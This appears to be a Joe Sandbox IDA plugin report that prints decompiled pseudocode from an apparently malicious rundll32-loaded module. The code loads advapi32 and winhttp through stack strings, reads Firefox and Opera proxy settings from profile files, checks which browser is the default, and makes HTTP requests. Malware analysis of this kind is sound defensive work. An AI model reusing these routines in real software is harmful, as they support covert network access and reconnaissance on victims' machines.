Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_5ade0000_rundll32.jbxd

Function 5ADE233A, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 54

C-Code - Quality: 100%

			E5ADE233A(void* __edx) {
				void* _v11;
				void* _v12;
				void* _v13;
				void* _v15;
				void* _v19;
				void* _v23;
				void* _v24;
				void* _v28;
				void* _v32;
				intOrPtr _v36;
				intOrPtr _v119;

				_v119 = _v119 + __edx;
				_v36 = 0x61766461;
			}

0x5ade233a
0x5ade2341

APIs

LoadLibraryA.KERNEL32(advapi32.dll), ref: 5ADE2384
LoadLibraryA.KERNEL32(winhttp.dl), ref: 5ADE23B4

Part of subcall function 5ADE23D5: GetProcAddress.KERNEL32(00000000,00000000,5ADE23A3), ref: 5ADE23DC

Strings

l, xrefs: 5ADE236E
winhttp.dl, xrefs: 5ADE23B0, 5ADE23B3
advapi32.dll, xrefs: 5ADE2380, 5ADE2383

Memory Dump Source

Source File: 00000003.00000002.1050244578.5ADE1000.00000040.sdmp, Offset: 5ADE0000, based on PE: true

Associated: 00000003.00000002.1050237480.5ADE0000.00000002.sdmp
Associated: 00000003.00000002.1050251399.5ADE3000.00000004.sdmp
Associated: 00000003.00000002.1050258466.5ADE4000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5ade0000_rundll32.jbxd

Function 5ADE233B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46

C-Code - Quality: 100%

			E5ADE233B() {
				intOrPtr _v11;
				char _v12;
				char _v13;
				short _v15;
				intOrPtr _v19;
				char _v23;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				void* __ebx;
				void* __ebp;
				struct HINSTANCE__* _t24;

				_v36 = 0x61766461;
				_v32 = 0x32336970;
				_v28 = 0x6c6c642e;
				_v24 = 0;
				_v23 = 0x686e6977;
				_v19 = 0x2e707474;
				_v15 = 0x6c64;
				_v13 = 0x6c;
				_v12 = 0;
				_v11 = 0;
				_t11 =  &_v36; // 0x61766461
				_t20 = LoadLibraryA(_t11);
				if(LoadLibraryA(_t11) != 0) {
					_v11 = 1;
					E5ADE23D5(_t20, _t20);
					if(_v11 != 0) {
						_v11 = 0;
						_t15 =  &_v23; // 0x686e6977
						_t24 = LoadLibraryA(_t15); // executed
						_t25 = _t24;
						if(_t24 != 0) {
							_v11 = 1;
							E5ADE23D5(_t25, _t25);
						}
					}
				}
				return _v11;
			}

0x5ade2341
0x5ade2348
0x5ade234f
0x5ade2356
0x5ade235a
0x5ade2361
0x5ade2368
0x5ade236e
0x5ade2372
0x5ade2376
0x5ade2380
0x5ade238a
0x5ade238c
0x5ade238e
0x5ade239e
0x5ade23a7
0x5ade23a9
0x5ade23b0
0x5ade23b4
0x5ade23ba
0x5ade23bc
0x5ade23be
0x5ade23ce
0x5ade23ce
0x5ade23bc
0x5ade23a7
0x5ade23f8

APIs

LoadLibraryA.KERNEL32(advapi32.dll), ref: 5ADE2384

Part of subcall function 5ADE23D5: GetProcAddress.KERNEL32(00000000,00000000,5ADE23A3), ref: 5ADE23DC

LoadLibraryA.KERNEL32(winhttp.dl), ref: 5ADE23B4

Strings

advapi32.dll, xrefs: 5ADE2380, 5ADE2383
l, xrefs: 5ADE236E
winhttp.dl, xrefs: 5ADE23B0, 5ADE23B3

Memory Dump Source

Source File: 00000003.00000001.791609688.5ADE2000.00000040.sdmp, Offset: 5ADE0000, based on PE: true

Associated: 00000003.00000001.791594880.5ADE0000.00000002.sdmp
Associated: 00000003.00000001.791601940.5ADE1000.00000080.sdmp
Associated: 00000003.00000001.791616802.5ADE3000.00000004.sdmp
Associated: 00000003.00000001.791624248.5ADE4000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_5ade0000_rundll32.jbxd

Function 5ADE2331, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 43

C-Code - Quality: 83%

			E5ADE2331(intOrPtr* __eax, void* __edx, void* __eflags) {
				intOrPtr _v7;
				char _v8;
				char _v9;
				short _v11;
				intOrPtr _v15;
				char _v19;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v119;
				void* __ebx;
				struct HINSTANCE__* _t22;
				struct HINSTANCE__* _t27;
				void* _t43;
				void* _t44;
				void* _t46;

				_t46 = _t43;
				_pop(_t44);
				asm("insb");
				if(__eflags <= 0) {
					_v19 = 0x686e6977;
					_v15 = 0x2e707474;
					_v11 = 0x6c64;
					_v9 = 0x6c;
					_v8 = 0;
					_v7 = 0;
					_t13 =  &_v32; // 0x61766461
					_t22 = LoadLibraryA(_t13);
					_t23 = _t22;
					if(_t22 != 0) {
						_v7 = 1;
						E5ADE23D5(_t23, _t23);
						if(_v7 != 0) {
							_v7 = 0;
							_t17 =  &_v19; // 0x686e6977
							_t27 = LoadLibraryA(_t17); // executed
							_t28 = _t27;
							if(_t27 != 0) {
								_v7 = 1;
								E5ADE23D5(_t28, _t28);
							}
						}
					}
				} else {
					asm("retf 0x6c");
					 *__eax =  *__eax + __eax;
					_v119 = _v119 + __edx;
					_push(_t44);
					_t44 = _t46;
					_v32 = 0x61766461;
				}
				return _v7;
			}

0x5ade2331
0x5ade2331
0x5ade2332
0x5ade2333
0x5ade235a
0x5ade2361
0x5ade2368
0x5ade236e
0x5ade2372
0x5ade2376
0x5ade2380
0x5ade2384
0x5ade238a
0x5ade238c
0x5ade238e
0x5ade239e
0x5ade23a7
0x5ade23a9
0x5ade23b0
0x5ade23b4
0x5ade23ba
0x5ade23bc
0x5ade23be
0x5ade23ce
0x5ade23ce
0x5ade23bc
0x5ade23a7
0x5ade2335
0x5ade2335
0x5ade2338
0x5ade233a
0x5ade233b
0x5ade233c
0x5ade2341
0x5ade2341
0x5ade23f8

APIs

LoadLibraryA.KERNEL32(advapi32.dll), ref: 5ADE2384

Part of subcall function 5ADE23D5: GetProcAddress.KERNEL32(00000000,00000000,5ADE23A3), ref: 5ADE23DC

LoadLibraryA.KERNEL32(winhttp.dl), ref: 5ADE23B4

Strings

l, xrefs: 5ADE236E
winhttp.dl, xrefs: 5ADE23B0, 5ADE23B3
advapi32.dll, xrefs: 5ADE2380, 5ADE2383

Memory Dump Source

Source File: 00000003.00000002.1050244578.5ADE1000.00000040.sdmp, Offset: 5ADE0000, based on PE: true

Associated: 00000003.00000002.1050237480.5ADE0000.00000002.sdmp
Associated: 00000003.00000002.1050251399.5ADE3000.00000004.sdmp
Associated: 00000003.00000002.1050258466.5ADE4000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5ade0000_rundll32.jbxd

Function 5ADE27FA, Relevance: 1.5, APIs: 1, Instructions: 2

C-Code - Quality: 100%

			E5ADE27FA() {

				ExitProcess(0);
			}

0x5ade27fc

APIs

ExitProcess.KERNEL32 ref: 5ADE27FC

Memory Dump Source

Source File: 00000003.00000001.791609688.5ADE2000.00000040.sdmp, Offset: 5ADE0000, based on PE: true

Associated: 00000003.00000001.791594880.5ADE0000.00000002.sdmp
Associated: 00000003.00000001.791601940.5ADE1000.00000080.sdmp
Associated: 00000003.00000001.791616802.5ADE3000.00000004.sdmp
Associated: 00000003.00000001.791624248.5ADE4000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_5ade0000_rundll32.jbxd

Non-executed Functions

Function 5ADE1F27, Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 162

C-Code - Quality: 93%

			E5ADE1F27(short* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				struct _WIN32_FIND_DATAW _v616;
				short _v1128;
				short _v1640;
				WCHAR* _t32;
				void* _t47;
				void* _t61;
				void* _t62;
				void* _t64;
				void* _t67;
				void* _t70;
				char* _t74;
				void* _t76;
				intOrPtr* _t77;
				intOrPtr* _t79;
				short* _t80;
				short* _t83;
				short* _t85;
				short* _t92;

				_v8 = 0xffffffff;
				_t32 =  &_v1128;
				__imp__SHGetSpecialFolderPathW(0, _t32, 0x1a, 0);
				if(_t32 != 0 && GetCurrentDirectoryW(0x100,  &_v1640) != 0 && SetCurrentDirectoryW( &_v1128) != 0) {
					if(SetCurrentDirectoryW(L"Mozilla\\Firefox\\Profiles") != 0) {
						_t47 = FindFirstFileW(L"*.*",  &_v616) + 1;
						if(_t47 != 0) {
							_v24 = _t47 - 1;
							while((_v616.cFileName & 0x000000ff) == 0x2e || StrStrIW( &(_v616.cFileName), L".default") == 0) {
								if(FindNextFileW(_v24,  &_v616) != 0) {
									continue;
								}
								L29:
								FindClose(_v24);
								goto L30;
							}
							if(SetCurrentDirectoryW( &(_v616.cFileName)) != 0) {
								_t61 = CreateFileW(L"prefs.js", 0x80000000, 1, 0, 3, 0x80, 0) + 1;
								if(_t61 != 0) {
									_t62 = _t61 - 1;
									_v20 = _t62;
									_t64 = CreateFileMappingW(_t62, 0, 2, 0, 0, 0);
									if(_t64 != 0) {
										_v16 = _t64;
										_t67 = MapViewOfFile(_v16, 4, 0, 0, 0);
										if(_t67 != 0) {
											_v12 = _t67;
											_t70 = GetFileSize(_v20, 0) + 1;
											if(_t70 != 0) {
												_t91 = _t70 - 1;
												_t74 = E5ADE22A9(_v12, _t70 - 1, "user_pref(\"network.proxy.type\", ");
												if(_t74 == 0) {
													L24:
													_v8 = 0;
												} else {
													if( *_t74 == 0x30) {
														_v8 = 1;
													} else {
														if( *_t74 != 0x31) {
															goto L24;
														} else {
															_t76 = E5ADE22A9(_v12, _t91, "user_pref(\"network.proxy.http\", ");
															if(_t76 != 0) {
																_t77 = _t76 + 1;
																_t80 = _a4;
																do {
																	 *_t80 =  *_t77;
																	_t80 = _t80 + 2;
																	_t77 = _t77 + 1;
																} while ( *_t77 != 0x22);
																 *_t80 = 0;
																_t92 = _t80;
																_t79 = E5ADE22A9(_v12, _t92, "user_pref(\"network.proxy.http_port\", ");
																if(_t79 != 0) {
																	_t83 = _t92;
																	 *_t83 = 0x3a;
																	_t85 = _t83 + 2;
																	do {
																		 *_t85 =  *_t79;
																		_t85 = _t85 + 2;
																		_t79 = _t79 + 1;
																	} while ( *_t79 != 0x29);
																	 *_t85 = 0;
																	_v8 = 2;
																}
															}
														}
													}
												}
											}
											UnmapViewOfFile(_v12);
										}
										CloseHandle(_v16);
									}
									CloseHandle(_v20);
								}
							}
							goto L29;
						}
					}
					L30:
					SetCurrentDirectoryW( &_v1640);
				}
				return _v8;
			}

0x5ade1f30
0x5ade1f38
0x5ade1f45
0x5ade1f4d
0x5ade1f8f
0x5ade1fa7
0x5ade1fa8
0x5ade1faf
0x5ade1fb2
0x5ade2125
0x00000000
0x00000000
0x5ade212b
0x5ade212e
0x00000000
0x5ade212e
0x5ade1feb
0x5ade200e
0x5ade200f
0x5ade2015
0x5ade2016
0x5ade202a
0x5ade202c
0x5ade2032
0x5ade2046
0x5ade2048
0x5ade204e
0x5ade205c
0x5ade205d
0x5ade2064
0x5ade2074
0x5ade2076
0x5ade20ef
0x5ade20ef
0x5ade2078
0x5ade207b
0x5ade20e6
0x5ade207d
0x5ade2080
0x00000000
0x5ade2082
0x5ade2090
0x5ade2092
0x5ade2094
0x5ade2095
0x5ade209a
0x5ade209c
0x5ade20a0
0x5ade20a1
0x5ade20a2
0x5ade20a7
0x5ade20ac
0x5ade20bc
0x5ade20be
0x5ade20c0
0x5ade20c2
0x5ade20c8
0x5ade20cb
0x5ade20cd
0x5ade20d1
0x5ade20d2
0x5ade20d3
0x5ade20d8
0x5ade20dd
0x5ade20dd
0x5ade20be
0x5ade2092
0x5ade2080
0x5ade207b
0x5ade2076
0x5ade20f9
0x5ade20f9
0x5ade2102
0x5ade2102
0x5ade210b
0x5ade210b
0x5ade200f
0x00000000
0x5ade1feb
0x5ade1fa8
0x5ade2134
0x5ade213b
0x5ade213b
0x5ade2146

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 5ADE1F45
GetCurrentDirectoryW.KERNEL32(00000100,?), ref: 5ADE1F5F
SetCurrentDirectoryW.KERNEL32(?), ref: 5ADE1F74
SetCurrentDirectoryW.KERNEL32(Mozilla\Firefox\Profiles), ref: 5ADE1F87
FindFirstFileW.KERNEL32(*.*,?), ref: 5ADE1FA1
StrStrIW.SHLWAPI(?,.default), ref: 5ADE1FCE
SetCurrentDirectoryW.KERNEL32(?), ref: 5ADE1FE3
CreateFileW.KERNEL32(prefs.js,80000000,00000001,00000000,00000003,00000080,00000000), ref: 5ADE2008
CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 5ADE2024
MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,00000000), ref: 5ADE2040
GetFileSize.KERNEL32(?,00000000), ref: 5ADE2056
UnmapViewOfFile.KERNEL32(?), ref: 5ADE20F9
CloseHandle.KERNEL32(?), ref: 5ADE2102
CloseHandle.KERNEL32(?), ref: 5ADE210B
FindNextFileW.KERNEL32(?,?), ref: 5ADE211D
FindClose.KERNEL32(?), ref: 5ADE212E
SetCurrentDirectoryW.KERNEL32(?), ref: 5ADE213B

Strings

user_pref("network.proxy.type", , xrefs: 5ADE2066
user_pref("network.proxy.http", , xrefs: 5ADE2082
*.*, xrefs: 5ADE1F9C
prefs.js, xrefs: 5ADE2003
Mozilla\Firefox\Profiles, xrefs: 5ADE1F82
user_pref("network.proxy.http_port", , xrefs: 5ADE20AE
.default, xrefs: 5ADE1FC8

Memory Dump Source

Source File: 00000003.00000002.1050244578.5ADE1000.00000040.sdmp, Offset: 5ADE0000, based on PE: true

Associated: 00000003.00000002.1050237480.5ADE0000.00000002.sdmp
Associated: 00000003.00000002.1050251399.5ADE3000.00000004.sdmp
Associated: 00000003.00000002.1050258466.5ADE4000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5ade0000_rundll32.jbxd

Function 5ADE1F27, Relevance: 25.7, APIs: 17, Instructions: 162

C-Code - Quality: 93%

			E5ADE1F27(short* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				struct _WIN32_FIND_DATAW _v616;
				short _v1128;
				short _v1640;
				WCHAR* _t32;
				void* _t47;
				void* _t61;
				void* _t62;
				void* _t64;
				void* _t67;
				void* _t70;
				char* _t74;
				void* _t76;
				intOrPtr* _t77;
				intOrPtr* _t79;
				short* _t80;
				short* _t83;
				short* _t85;
				short* _t92;

				_v8 = 0xffffffff;
				_t32 =  &_v1128;
				__imp__SHGetSpecialFolderPathW(0, _t32, 0x1a, 0);
				if(_t32 != 0 && GetCurrentDirectoryW(0x100,  &_v1640) != 0 && SetCurrentDirectoryW( &_v1128) != 0) {
					if(SetCurrentDirectoryW(0x5ade1507) != 0) {
						_t47 = FindFirstFileW(0x5ade155d,  &_v616) + 1;
						if(_t47 != 0) {
							_v24 = _t47 - 1;
							while((_v616.cFileName & 0x000000ff) == 0x2e || StrStrIW( &(_v616.cFileName), 0x5ade1539) == 0) {
								if(FindNextFileW(_v24,  &_v616) != 0) {
									continue;
								}
								L29:
								FindClose(_v24);
								goto L30;
							}
							if(SetCurrentDirectoryW( &(_v616.cFileName)) != 0) {
								_t61 = CreateFileW(0x5ade154b, 0x80000000, 1, 0, 3, 0x80, 0) + 1;
								if(_t61 != 0) {
									_t62 = _t61 - 1;
									_v20 = _t62;
									_t64 = CreateFileMappingW(_t62, 0, 2, 0, 0, 0);
									if(_t64 != 0) {
										_v16 = _t64;
										_t67 = MapViewOfFile(_v16, 4, 0, 0, 0);
										if(_t67 != 0) {
											_v12 = _t67;
											_t70 = GetFileSize(_v20, 0) + 1;
											if(_t70 != 0) {
												_t91 = _t70 - 1;
												_t74 = E5ADE22A9(_v12, _t70 - 1, 0x5ade159b);
												if(_t74 == 0) {
													L24:
													_v8 = 0;
												} else {
													if( *_t74 == 0x30) {
														_v8 = 1;
													} else {
														if( *_t74 != 0x31) {
															goto L24;
														} else {
															_t76 = E5ADE22A9(_v12, _t91, 0x5ade15bc);
															if(_t76 != 0) {
																_t77 = _t76 + 1;
																_t80 = _a4;
																do {
																	 *_t80 =  *_t77;
																	_t80 = _t80 + 2;
																	_t77 = _t77 + 1;
																} while ( *_t77 != 0x22);
																 *_t80 = 0;
																_t92 = _t80;
																_t79 = E5ADE22A9(_v12, _t92, 0x5ade15dd);
																if(_t79 != 0) {
																	_t83 = _t92;
																	 *_t83 = 0x3a;
																	_t85 = _t83 + 2;
																	do {
																		 *_t85 =  *_t79;
																		_t85 = _t85 + 2;
																		_t79 = _t79 + 1;
																	} while ( *_t79 != 0x29);
																	 *_t85 = 0;
																	_v8 = 2;
																}
															}
														}
													}
												}
											}
											UnmapViewOfFile(_v12);
										}
										CloseHandle(_v16);
									}
									CloseHandle(_v20);
								}
							}
							goto L29;
						}
					}
					L30:
					SetCurrentDirectoryW( &_v1640);
				}
				return _v8;
			}

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 5ADE1F45
GetCurrentDirectoryW.KERNEL32(00000100,?), ref: 5ADE1F5F
SetCurrentDirectoryW.KERNEL32(?), ref: 5ADE1F74
SetCurrentDirectoryW.KERNEL32(5ADE1507), ref: 5ADE1F87
FindFirstFileW.KERNEL32(5ADE155D,?), ref: 5ADE1FA1
StrStrIW.SHLWAPI(?,5ADE1539), ref: 5ADE1FCE
SetCurrentDirectoryW.KERNEL32(?), ref: 5ADE1FE3
CreateFileW.KERNEL32(5ADE154B,80000000,00000001,00000000,00000003,00000080,00000000), ref: 5ADE2008
CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 5ADE2024
MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,00000000), ref: 5ADE2040
GetFileSize.KERNEL32(?,00000000), ref: 5ADE2056
UnmapViewOfFile.KERNEL32(?), ref: 5ADE20F9
CloseHandle.KERNEL32(?), ref: 5ADE2102
CloseHandle.KERNEL32(?), ref: 5ADE210B
FindNextFileW.KERNEL32(?,?), ref: 5ADE211D
FindClose.KERNEL32(?), ref: 5ADE212E
SetCurrentDirectoryW.KERNEL32(?), ref: 5ADE213B

Memory Dump Source

Source File: 00000003.00000001.791601940.5ADE1000.00000080.sdmp, Offset: 5ADE0000, based on PE: true

Associated: 00000003.00000001.791594880.5ADE0000.00000002.sdmp
Associated: 00000003.00000001.791609688.5ADE2000.00000040.sdmp
Associated: 00000003.00000001.791616802.5ADE3000.00000004.sdmp
Associated: 00000003.00000001.791624248.5ADE4000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_5ade0000_rundll32.jbxd

Function 5ADE1032, Relevance: 30.0, APIs: 11, Strings: 6, Instructions: 292

APIs

StrStrA.SHLWAPI(00000000,accepted-), ref: 5ADE1201
StrToIntA.SHLWAPI(00000000), ref: 5ADE1268
lstrlenA.KERNEL32(00000000), ref: 5ADE1284
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000004), ref: 5ADE1299
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001), ref: 5ADE12B3
lstrlenA.KERNEL32(00000000), ref: 5ADE12D4
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000004), ref: 5ADE12E9
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001), ref: 5ADE1303
VirtualFree.KERNEL32(?,00000000,00008000), ref: 5ADE13A3
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 5ADE13B3
VirtualFree.KERNEL32(00000000,00008000), ref: 5ADE13E1

Strings

http, xrefs: 5ADE1228
.dll, xrefs: 5ADE111C
adva, xrefs: 5ADE1157, 5ADE133D
GET, xrefs: 5ADE114F, 5ADE1337
pi32, xrefs: 5ADE1177, 5ADE1356
accepted-, xrefs: 5ADE11FB

Memory Dump Source

Source File: 00000003.00000001.791601940.5ADE1000.00000080.sdmp, Offset: 5ADE0000, based on PE: true

Associated: 00000003.00000001.791594880.5ADE0000.00000002.sdmp
Associated: 00000003.00000001.791609688.5ADE2000.00000040.sdmp
Associated: 00000003.00000001.791616802.5ADE3000.00000004.sdmp
Associated: 00000003.00000001.791624248.5ADE4000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_5ade0000_rundll32.jbxd

Function 5ADE2149, Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 108

C-Code - Quality: 91%

			E5ADE2149(short* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				short _v532;
				short _v1044;
				WCHAR* _t20;
				void* _t34;
				void* _t35;
				void* _t37;
				void* _t40;
				void* _t43;
				char* _t47;
				intOrPtr* _t49;
				short* _t50;

				_v8 = 0xffffffff;
				_t20 =  &_v532;
				__imp__SHGetSpecialFolderPathW(0, _t20, 0x1a, 0);
				if(_t20 != 0 && GetCurrentDirectoryW(0x100,  &_v1044) != 0 && SetCurrentDirectoryW( &_v532) != 0) {
					if(SetCurrentDirectoryW(L"Opera\\Opera") == 0) {
						L19:
						SetCurrentDirectoryW( &_v1044);
					} else {
						_t34 = CreateFileW(L"operaprefs.ini", 0x80000000, 1, 0, 3, 0x80, 0) + 1;
						if(_t34 == 0) {
							goto L19;
						} else {
							_t35 = _t34 - 1;
							_v20 = _t35;
							_t37 = CreateFileMappingW(_t35, 0, 2, 0, 0, 0);
							if(_t37 == 0) {
								L18:
								CloseHandle(_v20);
								goto L19;
							} else {
								_v16 = _t37;
								_t40 = MapViewOfFile(_v16, 4, 0, 0, 0);
								if(_t40 == 0) {
									L17:
									CloseHandle(_v16);
									goto L18;
								} else {
									_v12 = _t40;
									_t43 = GetFileSize(_v20, 0) + 1;
									if(_t43 == 0) {
										L16:
										UnmapViewOfFile(_v12);
										goto L17;
									} else {
										_t54 = _t43 - 1;
										_t47 = E5ADE22A9(_v12, _t43 - 1, "Use HTTP=");
										if(_t47 == 0) {
											goto L16;
										} else {
											if( *_t47 == 0x30) {
												_v8 = 1;
												goto L16;
											} else {
												if( *_t47 != 0x31) {
													goto L16;
												} else {
													_t49 = E5ADE22A9(_v12, _t54, "HTTP server=");
													if(_t49 == 0) {
														goto L16;
													} else {
														_t50 = _a4;
														do {
															 *_t50 =  *_t49;
															_t50 = _t50 + 2;
															_t49 = _t49 + 1;
														} while ( *_t49 != 0xd);
														 *_t50 = 0;
														_v8 = 2;
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x5ade2152
0x5ade215a
0x5ade2167
0x5ade216f
0x5ade21b1
0x5ade2294
0x5ade229b
0x5ade21b7
0x5ade21d4
0x5ade21d5
0x00000000
0x5ade21db
0x5ade21db
0x5ade21dc
0x5ade21f0
0x5ade21f2
0x5ade228b
0x5ade228e
0x00000000
0x5ade21f8
0x5ade21f8
0x5ade220c
0x5ade220e
0x5ade2282
0x5ade2285
0x00000000
0x5ade2210
0x5ade2210
0x5ade221e
0x5ade221f
0x5ade2279
0x5ade227c
0x00000000
0x5ade2221
0x5ade2222
0x5ade2232
0x5ade2234
0x00000000
0x5ade2236
0x5ade2239
0x5ade2272
0x00000000
0x5ade223b
0x5ade223e
0x00000000
0x5ade2240
0x5ade224e
0x5ade2250
0x00000000
0x5ade2252
0x5ade2252
0x5ade2257
0x5ade2259
0x5ade225d
0x5ade225e
0x5ade225f
0x5ade2264
0x5ade2269
0x5ade2269
0x5ade2250
0x5ade223e
0x5ade2239
0x5ade2234
0x5ade221f
0x5ade220e
0x5ade21f2
0x5ade21d5
0x5ade21b1
0x5ade22a6

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 5ADE2167
GetCurrentDirectoryW.KERNEL32(00000100,?), ref: 5ADE2181
SetCurrentDirectoryW.KERNEL32(?), ref: 5ADE2196
SetCurrentDirectoryW.KERNEL32(Opera\Opera), ref: 5ADE21A9
CreateFileW.KERNEL32(operaprefs.ini,80000000,00000001,00000000,00000003,00000080,00000000), ref: 5ADE21CE
CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 5ADE21EA
MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,00000000), ref: 5ADE2206
GetFileSize.KERNEL32(?,00000000), ref: 5ADE2218
UnmapViewOfFile.KERNEL32(?), ref: 5ADE227C
CloseHandle.KERNEL32(?), ref: 5ADE2285
CloseHandle.KERNEL32(?), ref: 5ADE228E
SetCurrentDirectoryW.KERNEL32(?), ref: 5ADE229B

Strings

operaprefs.ini, xrefs: 5ADE21C9
Opera\Opera, xrefs: 5ADE21A4
Use HTTP=, xrefs: 5ADE2224
HTTP server=, xrefs: 5ADE2240

Memory Dump Source

Source File: 00000003.00000002.1050244578.5ADE1000.00000040.sdmp, Offset: 5ADE0000, based on PE: true

Associated: 00000003.00000002.1050237480.5ADE0000.00000002.sdmp
Associated: 00000003.00000002.1050251399.5ADE3000.00000004.sdmp
Associated: 00000003.00000002.1050258466.5ADE4000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5ade0000_rundll32.jbxd

Function 5ADE1E0C, Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 64

APIs

AssocQueryStringW.SHLWAPI(00000010,00000004,http,00000000,?,00000400), ref: 5ADE1E33
lstrcmpiW.KERNEL32(?,Internet Explorer,?,?,6F007200,?,73002F00,79006700), ref: 5ADE1E53
lstrcmpiW.KERNEL32(?,Firefox,?,?,6F007200,?,73002F00,79006700), ref: 5ADE1E6F
lstrcmpiW.KERNEL32(?,Google Chrome,?,?,6F007200,?,73002F00,79006700), ref: 5ADE1E8B
lstrcmpiW.KERNEL32(?,Safari,?,?,6F007200,?,73002F00,79006700), ref: 5ADE1EA7
lstrcmpiW.KERNEL32(?,Opera Internet Browser,?,?,6F007200,?,73002F00,79006700), ref: 5ADE1EC3

Strings

Firefox, xrefs: 5ADE1E69
Safari, xrefs: 5ADE1EA1
Internet Explorer, xrefs: 5ADE1E4D
Google Chrome, xrefs: 5ADE1E85
http, xrefs: 5ADE1E2A
Opera Internet Browser, xrefs: 5ADE1EBD

Memory Dump Source

Source File: 00000003.00000002.1050244578.5ADE1000.00000040.sdmp, Offset: 5ADE0000, based on PE: true

Associated: 00000003.00000002.1050237480.5ADE0000.00000002.sdmp
Associated: 00000003.00000002.1050251399.5ADE3000.00000004.sdmp
Associated: 00000003.00000002.1050258466.5ADE4000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5ade0000_rundll32.jbxd

Function 5ADE2149, Relevance: 18.1, APIs: 12, Instructions: 108

C-Code - Quality: 91%

			E5ADE2149(short* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				short _v532;
				short _v1044;
				WCHAR* _t20;
				void* _t34;
				void* _t35;
				void* _t37;
				void* _t40;
				void* _t43;
				char* _t47;
				intOrPtr* _t49;
				short* _t50;

				_v8 = 0xffffffff;
				_t20 =  &_v532;
				__imp__SHGetSpecialFolderPathW(0, _t20, 0x1a, 0);
				if(_t20 != 0 && GetCurrentDirectoryW(0x100,  &_v1044) != 0 && SetCurrentDirectoryW( &_v532) != 0) {
					if(SetCurrentDirectoryW(0x5ade1565) == 0) {
						L19:
						SetCurrentDirectoryW( &_v1044);
					} else {
						_t34 = CreateFileW(0x5ade157d, 0x80000000, 1, 0, 3, 0x80, 0) + 1;
						if(_t34 == 0) {
							goto L19;
						} else {
							_t35 = _t34 - 1;
							_v20 = _t35;
							_t37 = CreateFileMappingW(_t35, 0, 2, 0, 0, 0);
							if(_t37 == 0) {
								L18:
								CloseHandle(_v20);
								goto L19;
							} else {
								_v16 = _t37;
								_t40 = MapViewOfFile(_v16, 4, 0, 0, 0);
								if(_t40 == 0) {
									L17:
									CloseHandle(_v16);
									goto L18;
								} else {
									_v12 = _t40;
									_t43 = GetFileSize(_v20, 0) + 1;
									if(_t43 == 0) {
										L16:
										UnmapViewOfFile(_v12);
										goto L17;
									} else {
										_t54 = _t43 - 1;
										_t47 = E5ADE22A9(_v12, _t43 - 1, E5ADE1603);
										if(_t47 == 0) {
											goto L16;
										} else {
											if( *_t47 == 0x30) {
												_v8 = 1;
												goto L16;
											} else {
												if( *_t47 != 0x31) {
													goto L16;
												} else {
													_t49 = E5ADE22A9(_v12, _t54, E5ADE160D);
													if(_t49 == 0) {
														goto L16;
													} else {
														_t50 = _a4;
														do {
															 *_t50 =  *_t49;
															_t50 = _t50 + 2;
															_t49 = _t49 + 1;
														} while ( *_t49 != 0xd);
														 *_t50 = 0;
														_v8 = 2;
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 5ADE2167
GetCurrentDirectoryW.KERNEL32(00000100,?), ref: 5ADE2181
SetCurrentDirectoryW.KERNEL32(?), ref: 5ADE2196
SetCurrentDirectoryW.KERNEL32(5ADE1565), ref: 5ADE21A9
CreateFileW.KERNEL32(5ADE157D,80000000,00000001,00000000,00000003,00000080,00000000), ref: 5ADE21CE
CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 5ADE21EA
MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,00000000), ref: 5ADE2206
GetFileSize.KERNEL32(?,00000000), ref: 5ADE2218
UnmapViewOfFile.KERNEL32(?), ref: 5ADE227C
CloseHandle.KERNEL32(?), ref: 5ADE2285
CloseHandle.KERNEL32(?), ref: 5ADE228E
SetCurrentDirectoryW.KERNEL32(?), ref: 5ADE229B

Memory Dump Source

Source File: 00000003.00000001.791609688.5ADE2000.00000040.sdmp, Offset: 5ADE0000, based on PE: true

Associated: 00000003.00000001.791594880.5ADE0000.00000002.sdmp
